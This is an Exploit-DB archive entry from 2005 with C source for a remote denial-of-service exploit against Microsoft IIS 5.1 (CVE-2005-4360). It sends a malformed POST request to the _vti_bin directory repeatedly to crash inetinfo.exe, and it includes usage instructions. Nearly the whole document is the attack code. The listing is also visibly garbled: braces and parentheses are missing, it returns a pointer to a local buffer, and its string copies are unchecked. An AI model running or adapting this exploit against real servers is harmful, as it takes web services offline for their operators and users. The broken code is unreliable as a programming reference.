Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit c

ID EDB-ID:1376
Type exploitdb
Reporter Kozan
Modified 2005-12-19T00:00:00


MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c). CVE-2005-4360. Dos exploit for windows platform


Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan

Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft -

Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA,  Inge Henriksen

Microsoft® Internet Information Server® V5.1

Not vulnerable:
Microsoft® Internet Information Server® V5.0
Microsoft® Internet Information Server® V6.0

Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.

inetinfo.exe will be crashed after exploitation finished successfuly.

Usage: iis51dos.exe [Target Url or IP]


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

char *HttpHeader(char *pszHost)
       char szHeader[1000];

       wsprintf(       szHeader,       "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
                                                       "Content-Type: application/x-www-form-urlencoded\r\n"
                                                       "Host: %s\r\n"
                                                       "Content-Length: 0\r\n\r\n"
                                               ,       pszHost

       return szHeader;

int main(int argc, char *argv[])
       fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
                                       "Bug Discovered by: Inge Henriksen\n"
                                       "Exploit Coded by: Kozan\n"
                                       "Credits to ATmaCA, Inge Henriksen\n"
                                       " -\n\n"

       if( argc != 2 )
               fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
               return -1;

       WSADATA wsaData;
       struct hostent *pTarget;
       struct sockaddr_in addr;
       SOCKET sock;

       char szHeader[1000], szWebUrl[1000];

       lstrcpy(szWebUrl, argv[1]);
       lstrcpy(szHeader, HttpHeader(szWebUrl));

       if( WSAStartup(0x0101,&wsaData) < 0 )
               fprintf(stderr, "Winsock error!\n");
               return -1;

       sock = socket(AF_INET,SOCK_STREAM,0);

       if( sock == -1 )
               fprintf(stderr, "Socket error!\n");
               return -1;

       if( (pTarget = gethostbyname(szWebUrl)) == NULL )
               fprintf(stderr, "Address resolve error!\n");
               return -1;

       memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       addr.sin_family = AF_INET;
       addr.sin_port = htons(80);
       memset(&(addr.sin_zero), '\0', 8);

       fprintf(stdout, "Please wait while connecting...\n");

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
               fprintf(stderr, "Connection failed!\n");
               return -1;

       fprintf(stdout, "Connected.\n\n");

       fprintf(stdout, "Please wait while sending DoS request headers...\n\n");

       for( int i=0; i<4; i++ )
               fprintf(stdout, "Sending %d. request...\n", i+1);

               if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
                       fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
                       return -1;

               fprintf(stdout, "%d. request sent.\n\n", i+1);

       fprintf(stdout, "Operation completed...\n");

       return 0;

// [2005-12-19]